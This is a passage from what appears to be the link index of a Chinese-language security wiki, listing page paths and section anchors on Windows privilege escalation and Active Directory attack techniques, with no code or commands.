g/windows-local-privilege-escalation/com-hijacking.html#搜索不存在的-com-组件","windows-hardening/windows-local-privilege-escalation/com-hijacking.html#可劫持的-task-scheduler-com-组件","windows-hardening/windows-local-privilege-escalation/com-hijacking.html#com-typelib-hijacking-script-moniker-persistence","windows-hardening/windows-local-privilege-escalation/com-hijacking.html#步骤-powershell","windows-hardening/windows-local-privilege-escalation/com-hijacking.html#参考资料","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#dll-hijacking","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#基本信息","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#常见技术","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#查找缺失的-dlls","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#利用缺失的-dlls","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#dll-搜索顺序","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#通过-rtl_user_process_parametersdllpath-强制-sideloading","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#提升权限","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#自动化工具","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#示例","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#creating-and-compiling-dlls","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#dll-proxifying","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#meterpreter","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#your-own","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#案例研究cve-2025-1729---privilege-escalation-using-tpqmassistantexe","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#漏洞详情","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#利用实现","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#攻击流程","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#缓解措施","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#references","windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.html#writable-sys-path-dll-hijacking-privesc","windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.html#introduction","windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.html#privesc-with-dll-hijacking","windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.html#finding-a-missing-dll","windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.html#漏掉的-dll","windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.html#利用","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#dpapi---提取密码","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#what-is-dpapi","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#users-key-generation","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#机器系统密钥生成","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#由-dpapi-保护的数据","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#主密钥提取选项","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#列出-vault","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#访问-dpapi-加密数据","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#查找-dpapi-加密数据","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#访问密钥和数据","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#处理可选熵third-party-entropy","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#离线破解-masterkeys-hashcat--dpapisnoop","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#访问其他机器数据","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#other-tools","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#hekatomb","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#donpapi-2x-2024-05","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#dpapisnoop","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#common-detections","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#2023-2025-vulnerabilities--ecosystem-changes","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#case-study-zscaler-client-connector--custom-entropy-derived-from-sid","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#参考资料","windows-hardening/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.html","windows-hardening/windows-local-privilege-escalation/integrity-levels.html#integrity-levels","windows-hardening/windows-local-privilege-escalation/integrity-levels.html#integrity-levels-1","windows-hardening/windows-local-privilege-escalation/integrity-levels.html#integrity-levels-in-file-system","windows-hardening/windows-local-privilege-escalation/integrity-levels.html#二进制中的完整性级别","windows-hardening/windows-local-privilege-escalation/integrity-levels.html#进程中的完整性级别","windows-hardening/windows-local-privilege-escalation/juicypotato.html#juicypotato","windows-hardening/windows-local-privilege-escalation/juicypotato.html#juicy-potato-滥用黄金权限","windows-hardening/windows-local-privilege-escalation/juicypotato.html#compatibility-quick-notes","windows-hardening/windows-local-privilege-escalation/juicypotato.html#summary","windows-hardening/windows-local-privilege-escalation/juicypotato.html#juicy-details","windows-hardening/windows-local-privilege-escalation/juicypotato.html#usage","windows-hardening/windows-local-privilege-escalation/juicypotato.html#结语","windows-hardening/windows-local-privilege-escalation/juicypotato.html#juicypotatong-2022","windows-hardening/windows-local-privilege-escalation/juicypotato.html#示例","windows-hardening/windows-local-privilege-escalation/juicypotato.html#获取-ncexe-reverse-shell","windows-hardening/windows-local-privilege-escalation/juicypotato.html#powershell-rev","windows-hardening/windows-local-privilege-escalation/juicypotato.html#启动新的-cmd如果你有-rdp-访问","windows-hardening/windows-local-privilege-escalation/juicypotato.html#clsid-问题","windows-hardening/windows-local-privilege-escalation/juicypotato.html#检查-clsid","windows-hardening/windows-local-privilege-escalation/juicypotato.html#参考资料","windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.html#leaked-handle-exploitation","windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.html#介绍","windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.html#有趣的句柄","windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.html#进程","windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.html#线程","windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.html#文件键和节句柄","windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.html#如何查看进程的句柄","windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.html#process-hacker","windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.html#sysinternals-handles","windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.html#leakedhandlesfinder","windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.html#方法论","windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.html#漏洞示例","windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.html#exploit-example-1","windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.html#exploit-example-2","windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.html#其他工具和示例","windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.html#参考文献","windows-hardening/windows-local-privilege-escalation/msi-wrapper.html#msi-wrapper","windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.html#named-pipe-client-impersonation","windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.html#tldr","windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.html#requirements-and-key-apis","windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.html#minimal-win32-workflow-c","windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.html#net-快速示例","windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.html#常见触发强制手段让-system-连接到你的管道","windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.html#roguepotato-printspoofer-sharpefspotato-godpotato","windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.html#故障排查与注意事项","windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.html#检测与加固","windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.html#参考","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#privilege-escalation-with-autoruns","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#wmic","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#scheduled-tasks","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#文件夹","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#注册表","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#运行","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#启动路径","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#winlogon-keys","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#策略设置","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#alternateshell","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#changing-the-safe-mode-command-prompt","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#安装的组件","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#browser-helper-objects","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#overview-of-browser-helper-objects-bhos","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#internet-explorer-扩展","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#字体驱动程序","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#打开命令","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#图像文件执行选项","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#sysinternals","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#更多","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#参考文献","windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.html#roguepotato-printspoofer-sharpefspotato-godpotato","windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.html#requirements-and-common-gotchas","windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.html#快速演示","windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.html#printspoofer","windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.html#roguepotato","windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.html#sharpefspotato","windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.html#efspotato","windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.html#godpotato","windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.html#dcompotato","windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.html#sigmapotato-更新的-godpotato-fork","windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.html#检测与加固说明","windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.html#参考资料","windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.html#sedebug--seimpersonate---copy-token","windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.html#seimpersonate-from-high-to-system","windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.html#代码","windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.html#错误","windows-hardening/windows-local-privilege-escalation/windows-c-payloads.html#windows-c-payloads","windows-hardening/windows-local-privilege-escalation/windows-c-payloads.html#添加本地管理员用户","windows-hardening/windows-local-privilege-escalation/windows-c-payloads.html#uac-bypass--fodhelperexe-registry-hijack-medium--high-integrity","windows-hardening/windows-local-privilege-escalation/windows-c-payloads.html#spawn-system-shell-via-token-duplication-sedebugprivilege--seimpersonateprivilege","windows-hardening/windows-local-privilege-escalation/windows-c-payloads.html#内存中的-amsi--etw-patch-defence-evasion","windows-hardening/windows-local-privilege-escalation/windows-c-payloads.html#创建子进程为-protected-process-light-ppl","windows-hardening/windows-local-privilege-escalation/windows-c-payloads.html#参考资料","windows-hardening/active-directory-methodology/index.html#active-directory-方法论","windows-hardening/active-directory-methodology/index.html#基本概述","windows-hardening/active-directory-methodology/index.html#kerberos-authentication","windows-hardening/active-directory-methodology/index.html#速查表","windows-hardening/active-directory-methodology/index.html#侦察-active-directory-no-credssessions","windows-hardening/active-directory-methodology/index.html#用户枚举","windows-hardening/active-directory-methodology/index.html#知道一个或多个用户名","windows-hardening/active-directory-methodology/index.html#llmnrnbt-ns-poisoning","windows-hardening/active-directory-methodology/index.html#ntlm-relay","windows-hardening/active-directory-methodology/index.html#steal-ntlm-creds","windows-hardening/active-directory-methodology/index.html#使用凭证会话-枚举-active-directory","windows-hardening/active-directory-methodology/index.html#枚举","windows-hardening/active-directory-methodology/index.html#kerberoast","windows-hardening/active-directory-methodology/index.html#remote-connexion-rdp-ssh-ftp-win-rm-etc","windows-hardening/active-directory-methodology/index.html#local-privilege-escalation","windows-hardening/active-directory-methodology/index.html#current-session-tickets","windows-hardening/active-directory-methodology/index.html#ntlm-relay-1","windows-hardening/active-directory-methodology/index.html#在计算机共享中查找-creds--smb-shares","windows-hardening/active-directory-methodology/index.html#steal-ntlm-creds-1","windows-hardening/active-directory-methodology/index.html#cve-2021-1675cve-2021-34527-printnightmare","windows-hardening/active-directory-methodology/index.html#在拥有特权凭证会话的情况下对-active-directory-提权","windows-hardening/active-directory-methodology/index.html#hash-extraction","windows-hardening/active-directory-methodology/index.html#pass-the-hash","windows-hardening/active-directory-methodology/index.html#over-pass-the-hashpass-the-key","windows-hardening/active-directory-methodology/index.html#pass-the-ticket","windows-hardening/active-directory-methodology/index.html#credentials-reuse","windows-hardening/active-directory-methodology/index.html#mssql-abuse--trusted-links","windows-hardening/active-directory-methodology/index.html#it-assetdeployment-platforms-abuse","windows-hardening/active-directory-methodology/index.html#unconstrained-delegation","windows-hardening/active-directory-methodology/index.html#constrained-delegation","windows-hardening/active-directory-methodology/index.html#resourced-based-constrain-delegation","windows-hardening/active-directory-methodology/index.html#permissionsacls-abuse","windows-hardening/active-directory-methodology/index.html#printer-spooler-service-abuse","windows-hardening/active-directory-methodology/index.html#third-party-sessions-abuse","windows-hardening/active-directory-methodology/index.html#laps","windows-hardening/active-directory-methodology/index.html#certificate-theft","windows-hardening/active-directory-methodology/index.html#certificate-templates-abuse","windows-hardening/active-directory-methodology/index.html#post-exploitation-with-high-privilege-account","windows-hardening/active-directory-methodology/index.html#dumping-domain-credentials","windows-hardening/active-directory-methodology/index.html#privesc-as-persistence","windows-hardening/active-directory-methodology/index.html#silver-ticket","windows-hardening/active-directory-methodology/index.html#golden-ticket","windows-hardening/active-directory-methodology/index.html#diamond-ticket","windows-hardening/active-directory-methodology/index.html#certificates-account-persistence","windows-hardening/active-directory-methodology/index.html#certificates-domain-persistence","windows-hardening/active-directory-methodology/index.html#adminsdholder-group","windows-hardening/active-directory-methodology/index.html#dsrm-credentials","windows-hardening/active-directory-methodology/index.html#acl-persistence","windows-hardening/active-directory-methodology/index.html#security-descriptors","windows-hardening/active-directory-methodology/index.html#skeleton-key","windows-hardening/active-directory-methodology/index.html#custom-ssp","windows-hardening/active-directory-methodology/index.html#dcshadow","windows-hardening/active-directory-methodology/index.html#laps-persistence","windows-hardening/active-directory-methodology/index.html#forest-privilege-escalation---domain-trusts","windows-hardening/active-directory-methodology/index.html#basic-information","windows-hardening/active-directory-methodology/index.html#different-trusts","windows-hardening/active-directory-methodology/index.html#attack-path","windows-hardening/active-directory-methodology/index.html#find-external-usersgroups-with-permissions","windows-hardening/active-directory-methodology/index.html#child-to-parent-forest-privilege-escalation","windows-hardening/active-directory-methodology/index.html#external-forest-domain---one-way-inbound-or-bidirectional","windows-hardening/active-directory-methodology/index.html#外部林域---单向出站","windows-hardening/active-directory-methodology/index.html#域信任滥用缓解","windows-hardening/active-directory-methodology/index.html#sid-filtering","windows-hardening/active-directory-methodology/index.html#selective-authentication","windows-hardening/active-directory-methodology/index.html#ad---azure--azure---ad","windows-hardening/active-directory-methodology/index.html#一些常见防御措施","windows-hardening/active-directory-methodology/index.html#凭证保护的防御措施","windows-hardening/active-directory-methodology/index.html#实施诱饵deception技术","windows-hardening/active-directory-methodology/index.html#识别诱饵","windows-hardening/active-directory-methodology/index.html#规避检测系统","windows-hardening/active-directory-methodology/index.html#参考文献","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#滥用-active-directory-aclsaces","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#badsuccessor","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#用户上的-genericall-权限","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#组上的-genericall-权限","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#genericall--genericwrite--write-on-computeruser","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#writeproperty-on-group","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#self-self-membership-on-group","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#writeproperty-self-membership","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#forcechangepassword","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#writeowner-对组","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#genericwrite-on-user","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#genericwrite-on-group","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#writedacl--writeowner","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#writedaclwriteowner-快速接管-powerview","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#域内复制-dcsync","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#gpo-委派","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#gpo-委派-1","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#枚举-gpo-权限","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#滥用-gpo---new-gpoimmediatetask","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#grouppolicy-module---abuse-gpo","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#sharpgpoabuse---滥用-gpo","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#强制策略更新","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#深入解析","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#users-and-groups","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#sysvolnetlogon-logon-script-poisoning","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#定位-logon-scripts","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#验证写入访问不要相信共享列表","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#poison-a-vbscript-logon-script-for-rce","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#references","windows-hardening/active-directory-methodology/acl-persistence-abuse/BadSuccessor.html#滥用-active-directory-aclsaces","windows-hardening/active-directory-methodology/acl-persistence-abuse/BadSuccessor.html#概述","windows-hardening/active-directory-methodology/acl-persistence-abuse/BadSuccessor.html#dmsa-到底是什么","windows-hardening/active-directory-methodology/acl-persistence-abuse/BadSuccessor.html#攻击要求","windows-hardening/active-directory-methodology/acl-persistence-abuse/BadSuccessor.html#步骤badsuccessor特权提升","windows-hardening/active-directory-methodology/acl-persistence-abuse/BadSuccessor.html#收集所有用户密码","windows-hardening/active-directory-methodology/acl-persistence-abuse/BadSuccessor.html#工具","windows-hardening/active-directory-methodology/acl-persistence-abuse/BadSuccessor.html#参考","windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.html#shadow-credentials","windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.html#intro","windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.html#requirements","windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.html#abuse","windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.html#tools","windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.html#pywhisker","windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.html#shadowspray","windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.html#references","windows-hardening/active-directory-methodology/ad-certificates/index.html#ad-certificates","windows-hardening/active-directory-methodology/ad-certificates/index.html#introduction","windows-hardening/active-directory-methodology/ad-certificates/index.html#components-of-a-certificate","windows-hardening/active-directory-methodology/ad-certificates/index.html#special-considerations","windows-hardening/active-directory-methodology/ad-certificates/index.html#certificate-authorities-cas-in-active-directory-ad","windows-hardening/active-directory-methodology/ad-certificates/index.html#certificate-acquisition-client-certificate-request-flow","windows-hardening/active-directory-methodology/ad-certificates/index.html#certificate-templates","windows-hardening/active-directory-methodology/ad-certificates/index.html#certificate-enrollment","windows-hardening/active-directory-methodology/ad-certificates/index.html#template-enrollment-rights","windows-hardening/active-directory-methodology/ad-certificates/index.html#enterprise-ca-enrollment-rights","windows-hardening/active-directory-methodology/ad-certificates/index.html#additional-issuance-controls","windows-hardening/active-directory-methodology/ad-certificates/index.html#methods-to-request-certificates","windows-hardening/active-directory-methodology/ad-certificates/index.html#certificate-authentication","windows-hardening/active-directory-methodology/ad-certificates/index.html#kerberos-authentication-process","windows-hardening/active-directory-methodology/ad-certificates/index.html#安全通道-schannel-认证","windows-hardening/active-directory-methodology/ad-certificates/index.html#ad-证书服务枚举","windows-hardening/active-directory-methodology/ad-certificates/index.html#参考资料","windows-hardening/active-directory-methodology/ad-certificates/account-persistence.html#ad-cs-账户持久性","windows-hardening/active-directory-methodology/ad-certificates/account-persistence.html#理解使用证书的活动用户凭证盗窃--persist1","windows-hardening/active-directory-methodology/ad-certificates/account-persistence.html#使用证书获得机器持久性---persist2","windows-hardening/active-directory-methodology/ad-certificates/account-persistence.html#通过证书续订扩展持久性---persist3","windows-hardening/active-directory-methodology/ad-certificates/account-persistence.html#植入显式证书映射-altsecurityidentities--persist4","windows-hardening/active-directory-methodology/ad-certificates/account-persistence.html#作为持久性使用的注册代理--persist5","windows-hardening/active-directory-methodology/ad-certificates/account-persistence.html#2025-强证书映射强制执行对持久性的影响","windows-hardening/active-directory-methodology/ad-certificates/account-persistence.html#参考文献","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#ad-cs-domain-escalation","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#misconfigured-certificate-templates---esc1","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#explanation","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#misconfigured-certificate-templates---esc1-explained","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#abuse","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#配置错误的证书模板---esc2","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#解释","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#配置错误的-enrolment-agent-模板---esc3","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#解释-1","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#滥用","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#易受攻击的证书模板访问控制---esc4","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#说明","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#滥用-1","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#易受攻击的-pki-对象访问控制---esc5","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#说明-1","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#editf_attributesubjectaltname2---esc6","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#说明-2","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#滥用-2","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#易受攻击的证书颁发机构访问控制---esc7","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#攻击-1","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#攻击-2","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#攻击-3--manage-certificates-extension-abuse-setextension","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#ntlm-relay-到-ad-cs-http-端点--esc8","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#解释-2","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#滥用-3","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#无安全扩展---esc9","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#解释-3","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#滥用场景","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#弱证书映射---esc10","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#说明-3","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#滥用情形-1","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#滥用案例-2","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#将-ntlm-中继到-icpr---esc11","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#说明-4","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#滥用场景-1","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#使用-yubihsm-获取对-adcs-ca-的-shell-访问---esc12","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#说明-5","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#滥用场景-2","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#oid-group-link-abuse---esc13","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#解释-4","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#滥用场景-3","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#易受攻击的证书续期配置---esc14","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#说明-6","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#滥用场景-4","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#具体操作","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#ekuwu-application-policiescve-2024-49019---esc15","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#解释-5","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#滥用-4","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#ca-上禁用安全扩展全局-esc16","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#解释-6","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#滥用-5","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#使用证书破坏林被动语态说明","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#由被入侵的-cas-导致的林信任破坏","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#授予外部主体的-enrollment-权限","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#参考资料","windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.html#ad-cs-domain-persistence","windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.html#使用被盗-ca-证书伪造证书---dpersist1","windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.html#在强证书映射强制执行2025下的操作","windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.html#信任恶意-ca-证书---dpersist2","windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.html#恶意错误配置---dpersist3","windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.html#references","windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.html#ad-cs-证书盗窃","windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.html#我可以用证书做什么","windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.html#导出证书使用-crypto-apis--theft1","windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.html#通过-dpapi-盗取用户证书--theft2","windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.html#机器证书盗窃通过-dpapi--theft3","windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.html#查找证书文件--theft4","windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.html#ntlm-credential-theft-via-pkinit--theft5-unpac-the-hash","windows-hardening/active-directory-methodology/ad-certificates.html#ad-certificates","windows-hardening/active-directory-methodology/ad-certificates.html#introduction","windows-hardening/active-directory-methodology/ad-certificates.html#components-of-a-certificate","windows-hardening/active-directory-methodology/ad-certificates.html#special-considerations","windows-hardening/active-directory-methodology/ad-certificates.html#certificate-authorities-cas-in-active-directory-ad","windows-hardening/active-directory-methodology/ad-certificates.html#certificate-acquisition-client-certificate-request-flow","windows-hardening/active-directory-methodology/ad-certificates.html#certificate-templates","windows-hardening/active-directory-methodology/ad-certificates.html#certificate-enrollment","windows-hardening/active-directory-methodology/ad-certificates.html#template-enrollment-rights","windows-hardening/active-directory-methodology/ad-certificates.html#enterprise-ca-enrollment-rights","windows-hardening/active-directory-methodology/ad-certificates.html#additional-issuance-controls","windows-hardening/active-directory-methodology/ad-certificates.html#methods-to-request-certificates","windows-hardening/active-directory-methodology/ad-certificates.html#证书认证","windows-hardening/active-directory-methodology/ad-certificates.html#kerberos-认证过程","windows-hardening/active-directory-